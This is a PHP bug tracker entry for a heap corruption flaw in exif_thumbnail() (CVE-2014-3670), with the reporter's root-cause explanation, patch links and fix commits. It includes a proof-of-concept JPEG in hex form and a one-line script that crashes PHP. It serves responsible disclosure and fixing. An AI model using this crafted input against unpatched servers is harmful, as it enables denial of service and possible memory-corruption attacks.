php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #68113 Heap corruption in exif_thumbnail()
Submitted: 2014-09-28 23:31 UTC Modified: 2014-10-14 17:41 UTC
From: stas@php.net Assigned:
Status: Closed Package: EXIF related
PHP Version: 5.4.33 OS: *
Private report: No CVE-ID: 2014-3670
 [2014-09-28 23:31 UTC] stas@php.net
Description:
------------
Report by Otto Ebeling:



Hi,

I¹d like to report a bug that causes heap corruption when parsing
the thumbnail of a specially crafted .jpg image. Could you confirm
that you can repro and provide an estimated timeline for releasing
the fix so we can coordinate this with the HHVM team as HHVM contains
the affected code as well?

Details:
PHP provides APIs such as exif_thumbnail that can be used to extract
embedded thumbnails from various image formats. In the process of
extracting a TIFF-formatted EXIF thumbnail from a JPEG image, PHP
re-encodes most IFD tags present in the thumbnail directory and
prepends them to the thumbnail image in order to produce a standalone
TIFF file. Individual values are re-encoded using the
exif_ifd_make_value function.

If this function is asked to write out an array of floating point
values (single or double precision), it erroneously uses the size
of the whole array when copying individual elements using memmove,
leading to heap corruption.

See:
https://github.com/php/php-src/blob/dbccc8c112e0afaa34db7a913096f849a02da4de/ext/exif/exif.c#L2447
byte_count is the length of the entire array as calculated at
https://github.com/php/php-src/blob/dbccc8c112e0afaa34db7a913096f849a02da4de/ext/exif/exif.c#L2390

In addition to this, the 'from' pointer of the memmove calls point
to the pointer to the array, not its contents. Instead of
&info_data->value.f, the code should be using &info_value->f

To exploit a target application that uses this API (or exif_read_data with
suitable parameters), a malicious user can trigger this condition by
supplying a tag that contains an array of floating-point values, and
futher tags that indicate the presence of a TIFF thumbnail. The image
itself need not be valid as long as the exif_ifd_make_value gets invoked.

Example .jpg file (xxd format) that causes a SIGSEGV on PHP 5.6.0:
0000000: ffd8 ffe1 0050 4578 6966 0000 4949 2a00  .....PExif..II*.
0000010: 1500 0000 ff00 0020 0000 00ff ffff ffff  ....... ........
0000020: 1100 001d 0000 0000 0003 001a 010c 0024  ...............$
0000030: 0000 0017 0000 0001 0204 0001 0000 0040  ...............@
0000040: 0000 0017 0104 0001 0000 0001 0000 0000  ................
0000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000090: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000100: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000110: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000120: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000130: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000140: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000150: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000160: 0000 0000 0000 0000 0000 0000 0000 0000  ................

Script:
<?php exif_thumbnail("corrupt_heap.jpg"); ?>

Regards,
Otto Ebeling
Facebook Security Infrastructure




Patches

exif-fix (last revision 2014-09-29 00:00 UTC) by stas@php.net)

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2014-09-29 00:00 UTC] stas@php.net
The following patch has been added/updated:

Patch Name: exif-fix
Revision:   1411948801
URL:        https://bugs.php.net/patch-display.php?bug=68113&patch=exif-fix&revision=1411948801
 [2014-09-29 05:34 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2014-3670
 [2014-10-14 17:42 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=287c91c1f060dc85a8bdb51488c50db8614448b7
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:42 UTC] stas@php.net
-Status: Open +Status: Closed
 [2014-10-14 17:44 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ddb207e7fa2e9adeba021a1303c3781efda5409b
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:45 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f9ba0a157f2d7e6d027285cb2ef964a919e67b8e
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:46 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ddb207e7fa2e9adeba021a1303c3781efda5409b
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4a38cc0a3c4db2ac42a5063df0f6ee1ec70b30ff
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f9ba0a157f2d7e6d027285cb2ef964a919e67b8e
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ddb207e7fa2e9adeba021a1303c3781efda5409b
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-15 10:10 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4a38cc0a3c4db2ac42a5063df0f6ee1ec70b30ff
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-15 10:11 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f9ba0a157f2d7e6d027285cb2ef964a919e67b8e
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-15 10:11 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ddb207e7fa2e9adeba021a1303c3781efda5409b
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-15 12:08 UTC] jpauli@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=d0a6b7d1242bab3ebd4f1687bfa56b01e6767f67
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-11-03 19:40 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=287c91c1f060dc85a8bdb51488c50db8614448b7
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-11-18 20:35 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=287c91c1f060dc85a8bdb51488c50db8614448b7
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2016-07-20 11:40 UTC] davey@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4a38cc0a3c4db2ac42a5063df0f6ee1ec70b30ff
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Nov 19 01:31:42 2017 UTC